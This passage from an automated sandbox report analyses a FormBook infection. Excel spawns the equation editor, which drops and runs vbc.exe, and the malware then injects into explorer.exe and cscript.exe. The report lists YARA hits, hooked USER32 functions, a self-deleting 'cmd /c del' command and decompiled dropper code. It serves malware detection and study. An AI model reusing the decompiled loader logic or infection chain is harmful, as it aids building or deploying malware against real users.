                                        Processes

                                        Process: explorer.exe, Module: USER32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: EXCEL.EXE PID: 1912 Parent PID: 596

                                        General

                                        Start time:19:23:13
                                        Start date:25/11/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13faa0000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: EQNEDT32.EXE PID: 2680 Parent PID: 596

                                        General

                                        Start time:19:23:35
                                        Start date:25/11/2021
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: vbc.exe PID: 2868 Parent PID: 2680

                                        General

                                        Start time:19:23:40
                                        Start date:25/11/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:475934 bytes
                                        MD5 hash:4D1B51FE258BE32D346B3507ABEDDCB3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: vbc.exe PID: 1292 Parent PID: 2868

                                        General

                                        Start time:19:23:42
                                        Start date:25/11/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:475934 bytes
                                        MD5 hash:4D1B51FE258BE32D346B3507ABEDDCB3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: explorer.exe PID: 1764 Parent PID: 1292

                                        General

                                        Start time:19:23:44
                                        Start date:25/11/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xffa10000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: cscript.exe PID: 2216 Parent PID: 1764

                                        General

                                        Start time:19:23:56
                                        Start date:25/11/2021
                                        Path:C:\Windows\SysWOW64\cscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cscript.exe
                                        Imagebase:0xa40000
                                        File size:126976 bytes
                                        MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 772 Parent PID: 2216

                                        General

                                        Start time:19:24:01
                                        Start date:25/11/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\Public\vbc.exe"
                                        Imagebase:0x4a950000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: vbc.exe PID: 2868 Parent PID: 2680 vbc.exeCOMMON

                                          Executed Functions

                                          Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("psfiki Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\Public\\vbc.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\Public";
										if(lstrcmpiA(_t105, "C:\\Users\\Public") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x2903c0
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x2903c0
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                          0x004030ef
                                          0x004030f3
                                          0x004030fb
                                          0x004030fd
                                          0x00403102
                                          0x0040310d
                                          0x00403114
                                          0x0040311c
                                          0x00403126
                                          0x0040313c
                                          0x0040314c
                                          0x00403151
                                          0x00403157
                                          0x0040315e
                                          0x00403171
                                          0x00403176
                                          0x00403178
                                          0x0040317a
                                          0x0040317f
                                          0x0040317f
                                          0x0040318f
                                          0x00403195
                                          0x004031fe
                                          0x004031fe
                                          0x00403200
                                          0x00403202
                                          0x00000000
                                          0x00000000
                                          0x0040319b
                                          0x0040319e
                                          0x004031a6
                                          0x004031a6
                                          0x004031a9
                                          0x004031ae
                                          0x004031b0
                                          0x004031b0
                                          0x004031b1
                                          0x004031b1
                                          0x004031b6
                                          0x004031b9
                                          0x004031ee
                                          0x004031f3
                                          0x004031f8
                                          0x004031fb
                                          0x004031fd
                                          0x004031fd
                                          0x004031fd
                                          0x00000000
                                          0x004031bb
                                          0x004031bb
                                          0x004031bc
                                          0x004031bf
                                          0x004031c7
                                          0x004031ca
                                          0x004031cc
                                          0x004031cc
                                          0x004031cc
                                          0x004031ca
                                          0x004031cf
                                          0x004031d5
                                          0x004031dd
                                          0x004031e0
                                          0x004031e2
                                          0x004031e2
                                          0x004031e2
                                          0x004031e0
                                          0x004031e5
                                          0x004031ec
                                          0x00403206
                                          0x00403209
                                          0x00403209
                                          0x00403212
                                          0x00403217
                                          0x00403217
                                          0x00403222
                                          0x00403228
                                          0x0040322d
                                          0x0040322f
                                          0x00403251
                                          0x00403256
                                          0x0040325d
                                          0x00403264
                                          0x00403268
                                          0x004032cf
                                          0x004032cf
                                          0x004032d4
                                          0x004032de
                                          0x004033c9
                                          0x004033cf
                                          0x004033da
                                          0x004033e3
                                          0x004033e5
                                          0x004033ea
                                          0x004033ec
                                          0x004033ee
                                          0x004033f0
                                          0x004033f2
                                          0x004033f4
                                          0x004033f6
                                          0x00403406
                                          0x00403408
                                          0x0040340a
                                          0x00403417
                                          0x00403426
                                          0x0040342e
                                          0x00403436
                                          0x00403436
                                          0x0040340a
                                          0x004033f6
                                          0x004033f2
                                          0x0040343b
                                          0x00403441
                                          0x00403443
                                          0x00403447
                                          0x00403447
                                          0x00403443
                                          0x0040344c
                                          0x00403451
                                          0x00403454
                                          0x00403456
                                          0x00403456
                                          0x0040345e
                                          0x0040345e
                                          0x004032ed
                                          0x004032f4
                                          0x004032f4
                                          0x0040326a
                                          0x00403270
                                          0x004032bf
                                          0x004032bf
                                          0x004032cb
                                          0x00000000
                                          0x004032cb
                                          0x00403279
                                          0x00403286
                                          0x0040327d
                                          0x00403283
                                          0x00000000
                                          0x00000000
                                          0x00403285
                                          0x00403285
                                          0x00403285
                                          0x0040328a
                                          0x0040328c
                                          0x00403294
                                          0x00403300
                                          0x00403305
                                          0x00403314
                                          0x00000000
                                          0x00000000
                                          0x00403318
                                          0x0040331f
                                          0x00403325
                                          0x0040332b
                                          0x00403333
                                          0x00403333
                                          0x00403341
                                          0x00403348
                                          0x00403351
                                          0x00403357
                                          0x00403357
                                          0x00403363
                                          0x00403369
                                          0x00403373
                                          0x00403387
                                          0x00403388
                                          0x00403389
                                          0x0040338e
                                          0x0040339a
                                          0x004033a0
                                          0x004033a7
                                          0x004033aa
                                          0x004033b0
                                          0x004033b0
                                          0x004033a7
                                          0x004033b4
                                          0x004033ba
                                          0x004033ba
                                          0x004033bd
                                          0x004033be
                                          0x004033bf
                                          0x00000000
                                          0x004033bf
                                          0x00403296
                                          0x00403298
                                          0x004032a3
                                          0x00000000
                                          0x00000000
                                          0x004032ab
                                          0x004032b6
                                          0x004032bb
                                          0x00000000
                                          0x004032bb
                                          0x00403237
                                          0x00403243
                                          0x00403248
                                          0x0040324d
                                          0x0040324f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040324f
                                          0x00000000
                                          0x004031ec
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004031a0
                                          0x004031a0
                                          0x004031a0
                                          0x004031a1
                                          0x004031a1
                                          0x00000000
                                          0x004031a0
                                          0x00000000

                                          APIs
                                          • #17.COMCTL32 ref: 00403102
                                          • SetErrorMode.KERNEL32(00008001), ref: 0040310D
                                          • OleInitialize.OLE32(00000000), ref: 00403114
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                            • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,psfiki Setup,NSIS Error), ref: 00405938
                                          • GetCommandLineA.KERNEL32(psfiki Setup,NSIS Error), ref: 00403151
                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403164
                                          • CharNextA.USER32(00000000), ref: 0040318F
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403222
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                          • DeleteFileA.KERNEL32(1033), ref: 00403256
                                          • OleUninitialize.OLE32 ref: 004032D4
                                          • ExitProcess.KERNEL32 ref: 004032F4
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00403300
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 0040330C
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                          • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                          • CopyFileA.KERNEL32 ref: 0040337D
                                          • CloseHandle.KERNEL32(00000000), ref: 004033AA
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                          • ExitProcess.KERNEL32 ref: 0040345E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$"$"C:\Users\Public\vbc.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$psfiki Setup$~nsu.tmp
                                          • API String ID: 2278157092-1150292763
                                          • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                          • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                          • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                          • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004054FF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E0040592B(0x42afe0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405465(_t72);
					} else {
						lstrcatA(0x42afe0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405449( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E0040592B(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004055E3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404CC9(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404CC9(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405679();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405250(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
